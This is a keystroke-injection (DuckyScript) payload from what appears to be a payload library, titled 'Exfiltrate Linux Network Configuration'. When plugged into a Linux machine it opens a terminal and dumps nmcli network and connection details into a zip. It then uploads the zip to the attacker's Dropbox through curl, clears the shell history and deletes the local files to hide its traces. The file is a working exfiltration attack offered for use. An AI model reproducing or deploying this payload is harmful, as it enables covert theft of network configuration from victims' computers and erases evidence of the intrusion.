Path: blob/master/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
2971 views
1REM ##########################################################2REM # |3REM # Title : Exfiltrate Linux Network Configuration |4REM # Author : Aleff |5REM # Version : 1.0 |6REM # Category : Exfiltration, Execution |7REM # Target : Linux |8REM # |9REM ##########################################################1011REM Requirements:12REM - Internet Connection13REM - Dropbox Account14REM - - DROPBOX_ACCESS_TOKEN1516DELAY 100017CTRL-ALT t1819DELAY 200020REM Required: Set here your Dropbox access TOKEN21DEFINE TOKEN example22STRING ACCESS_TOKEN="23STRING TOKEN24STRING "25ENTER2627REM DELAY 50028REM STRING USER_NAME=$(whoami)29REM ENTER3031DELAY 50032STRING RANDOM=$(shuf -i 1-999999999999 -n 1)33ENTER3435DELAY 50036STRING ZIP_NAME="$RANDOM.zip"37ENTER38DELAY 50039STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"40ENTER4142REM Folder path43DELAY 50044STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)45ENTER4647DELAY 50048STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"49ENTER5051DELAY 100052STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"53ENTER5455DELAY 100056STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"57ENTER5859DELAY 100060REM Delay for zipping operation, it depends by computer power and folder directory61STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"62DELAY 3000636465REM Set yout Dropbox folder name66DEFINE DROPBOX_FOLDER_NAME example67STRING DROPBOX_FOLDER="/68ENTER69STRING DROPBOX_FOLDER_NAME70ENTER71STRING "72ENTER73DELAY 5007475DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload76STRING curl -X POST77STRING DROPBOX_API_CONST78STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"79ENTER8081DELAY 200082STRING history -c83ENTER8485DELAY 50086STRING rm -rf "$TMP_FOLDER_PATH"87ENTER8889DELAY 50090STRING rm -rf "$ZIP_PATH"91ENTER9293DELAY 50094STRING exit95ENTER9697